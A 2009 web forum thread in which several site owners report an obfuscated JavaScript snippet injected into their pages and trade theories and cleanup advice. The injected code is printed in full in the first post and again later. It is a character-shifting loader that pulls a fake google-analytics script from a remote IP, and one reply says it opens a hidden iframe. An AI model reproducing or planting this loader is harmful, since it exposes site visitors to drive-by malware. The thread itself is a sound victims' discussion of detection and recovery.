1. Advertising
    y u no do it?

    Advertising (learn more)

    Advertise virtually anything here, with CPM banner ads, CPM email ads and CPC contextual links. You can target relevant areas of the site and show ads based on geographical location of the user if you wish.

    Starts at just $1 per CPM or $0.10 per CPC.

Please help I have found a mysterious code on a lot of my websites? Is this a hack?

Discussion in 'Programming' started by canaryspace, Mar 23, 2009.

  1. #1
    I recently checked some of my sites and found that some text in the index files had been deleted. At the bottom of the pages I found this code..

    <script>var source ="=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;0095/355/249/660hpphmf.bobmzujdt0hb/kt#?=0tdsjqu?"; var result = "";for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);document.write(result); </script>

    Does anyone know what this is?

    I have deleted the code from all the pages I could find.

    Please help.

    Thank you.
     
    canaryspace, Mar 23, 2009 IP
  2. wizkid0319

    wizkid0319 Peon

    Messages:
    83
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    0
    #2
    as far as i understand what it dows is just printing "=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;0095/355/249/660hpphmf.bobmzujdt0hb/kt#?=0tdsjqu?" on your webpage.....

    thats all.....

    cheers
     
    wizkid0319, Mar 23, 2009 IP
  3. emed

    emed Peon

    Messages:
    70
    Likes Received:
    12
    Best Answers:
    0
    Trophy Points:
    0
    #3
    that code insert this javascript:
    http://84.244.138.55/google-analytics/ga.js (not the real google analytics)

    then this new code insert this page (http://84.244.138.55/ts/in.cgi?sliframe) on a hidden iframe on your page

    i dont know what that page do, it set some cookies then redirect you to www.cmyip.com
     
    emed, Mar 23, 2009 IP
  4. wizkid0319

    wizkid0319 Peon

    Messages:
    83
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    0
    #4
    wizkid0319, Mar 23, 2009 IP
  5. emed

    emed Peon

    Messages:
    70
    Likes Received:
    12
    Best Answers:
    0
    Trophy Points:
    0
    #5
    add/change a few things and you get this:
    [B]javascript:[/B]var source ="=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;0095/355/249/660hpphmf.bobmzujdt0hb/kt#?=0tdsjqu?"; var result = "";for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);[B]alert[/B](result);
    Code (markup):
    copy and paste on your address bar and hit enter, you get the decoded text
     
    emed, Mar 23, 2009 IP
  6. wizkid0319

    wizkid0319 Peon

    Messages:
    83
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    0
    #6
    any ways.... how can other people add this code into this persons web pages???

    hey is your web page a comments page??

    cheers
     
    wizkid0319, Mar 23, 2009 IP
  7. canaryspace

    canaryspace Well-Known Member

    Messages:
    1,320
    Likes Received:
    16
    Best Answers:
    0
    Trophy Points:
    160
    #7
    My hosting company says that the only way this code could have been placed on my sites is if the hacker had my ftp passwords. I have found this code now on 30 of my sites, so it seems that the hacker had access to my hosting account as all my passwords are different for each ftp account.

    I have no idea how the hacker got access to my hosting account, I use only one computer and no one else has access to it. No one knows any of my passwords and I dont have them written down. Basically no one has access to any of my passwords unless they can read my mind!

    There only thing I can think of is spyware or a virus infected my browser and traced my passwords without me knowing a thing about it!

    Anyway, my hosting company did a trace on the ftp login and came up with this ip address

    209.124.81.18

    This is the address of an ftp login on my websites, it belongs to USA and is hosted my Dragon Networks, Inc. I have contacted dragon without any reply from them so I will now publish this ip address all over the net. I would advise anyone to create a htaccess file and block the whole ip range from dragon because I am not sure if this hacker has access to more than 1 ip address with dragon.

    ip range

    209.124.64.0 - 209.124.95.255

    I have been through quite a bad time here with this hack, not knowing how far they went or what else they have access to. I have had to not only change all my ftp passwords on all of my sites but also change my Facebook, Hotmail, Bank etc etc login details. I have had to search almost every file on my sites to delete that code manually. Some of my sites I have had to rebuild the index pages because some info was deleted.

    In future I am going to be checking my sites a lot more.

    I am tired now and hope this doesnt happen to anyone else, although chances are it could be you next!
     
    canaryspace, Mar 24, 2009 IP
  8. centralb

    centralb Peon

    Messages:
    26
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    0
    #8
    Does your host support FTPS encryption for secure FTP connections?

    Consider running Malwarebytes Anti-Malware on the systems you use to modify your site. You might have a trojan installed.

    Check also if your server manager regularly scans the server(s) for rootkits/backdoors/trojans.
     
    centralb, Mar 24, 2009 IP
  9. canaryspace

    canaryspace Well-Known Member

    Messages:
    1,320
    Likes Received:
    16
    Best Answers:
    0
    Trophy Points:
    160
    #9
    Is there anyway of taking legal action online? I just found that this person has definatly got it in for me. I thought it was a random attack, but I have now found the sites attacked are my busiest and more files with the code on have appeared. This is taking me a long time to clear up, but I am getting there.

    Thank you for your help and support.
     
    canaryspace, Mar 24, 2009 IP
  10. boompie

    boompie Peon

    Messages:
    17
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #10
    is Safe_Mode enabled in your PHP configuration ?

    Carl
     
    boompie, Mar 25, 2009 IP
  11. joeldavuk

    joeldavuk Peon

    Messages:
    4
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #11
    Hi Canary we have recently had the same problem, did you come to any conclusions on finding the source of the problem?
     
    joeldavuk, Mar 26, 2009 IP
  12. SonnyCooL

    SonnyCooL Peon

    Messages:
    1,170
    Likes Received:
    13
    Best Answers:
    0
    Trophy Points:
    0
    #12
    i have similar problem, i accidentally leave my file on CH777 for two hour (after edit forget to change) and the stupid file all over the folder ...
     
    SonnyCooL, Mar 26, 2009 IP
  13. canaryspace

    canaryspace Well-Known Member

    Messages:
    1,320
    Likes Received:
    16
    Best Answers:
    0
    Trophy Points:
    160
    #13
    Who are you using for your host?

    I had to download all my websites, use simple search and replace software to find the infected files, delete them and upload them. I also changed all my ftp passwords and main server password. I don't think it had anything to do with chmod 777 as the files infected where chmod 644. Also nothing to do with php scripting as some files on my websites didn't contain php scripts, they were basic frontpage index files. I am more concerned about my hosting as I reckon it is a server hack. Please let me know who you are hosted with, if it matches my host I will forward this thread to them.

    Thank you.
     
    canaryspace, Mar 26, 2009 IP
  14. mnistor1

    mnistor1 Peon

    Messages:
    1
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #14
    I'm having the same issue mentioned above here I get that snippet of code on my rendered page at the very top of the page when you view source. I've done a search through all the files for that exact code but nothing comes up. Does the actual code that generates that snippet look differently than the code that is rendered on the page? This is driving me nuts, any help is appreciated! The site is my wifes wedding blog: www.vintageglamblog.com

    matt

    OFFENDING CODE ON RENDERED PAGE ABOVE DOC TYPE:

    <script>var source ="=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;0095/355/249/660hpphmf.bobmzujdt0hb/kt#?=0tdsjqu?"; var result = "";for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);document.write(result); </script>
     
    mnistor1, Mar 28, 2009 IP
  15. Oliver341

    Oliver341 Peon

    Messages:
    5
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #15
    I have just found this code on my website too, and I found this thread by Googling the offending code. According to the last modification date the code was inserted on 24 March 2009.

    My web host is .Com Web Hosting and they are a reseller for Heart Internet. I have opened a support ticket and I am waiting a reply. Who is your web host, canaryspace?
     
    Oliver341, Mar 28, 2009 IP
  16. centralb

    centralb Peon

    Messages:
    26
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    0
    #16
    If you haven't already, change your account access passwords. Including those passwords for FTP, e-mail, and SSH access. Also, scan your computer(s) for trojans and spyware that may have allowed the attacker to discover your passwords.

    Many people have good results with Malwarebytes' Anti-Malware
     
    centralb, Mar 28, 2009 IP
  17. canaryspace

    canaryspace Well-Known Member

    Messages:
    1,320
    Likes Received:
    16
    Best Answers:
    0
    Trophy Points:
    160
    #17
    I am a reseller for Heartinternet! Anyone else?????
     
    canaryspace, Mar 29, 2009 IP
  18. mcapodici

    mcapodici Well-Known Member

    Messages:
    228
    Likes Received:
    2
    Best Answers:
    0
    Trophy Points:
    120
    #18
    CanarySpace - I've had the same problem, got an email from Google and all. And yes I'm a Heart Internet reseller (ironically I am in the process of moving o Hostgator to save money - this incident may speed things up!!) :)
     
    mcapodici, Mar 29, 2009 IP
  19. Valve-Hosting

    Valve-Hosting Peon

    Messages:
    1,071
    Likes Received:
    31
    Best Answers:
    0
    Trophy Points:
    0
    #19
    I can't say for sure but I would take an educated guess and say it's poor server side settings.

    If someone had access to all your web logins they'd probably do more than spam your sites with broken code, one by one.

    Theres a lot of ways this might/could happen, but if I were you I'd move hosts and run a virus checker (Kaspersky is best IMO 30 day trial too) :)
     
    Valve-Hosting, Mar 30, 2009 IP
  20. micksss

    micksss Notable Member

    Messages:
    4,427
    Likes Received:
    268
    Best Answers:
    1
    Trophy Points:
    285
    #20
    Can you run Kaspersky on a shared host or is this a solution that you can only implement if you have a dedicated server? Thank you for your time.
     
    micksss, Mar 30, 2009 IP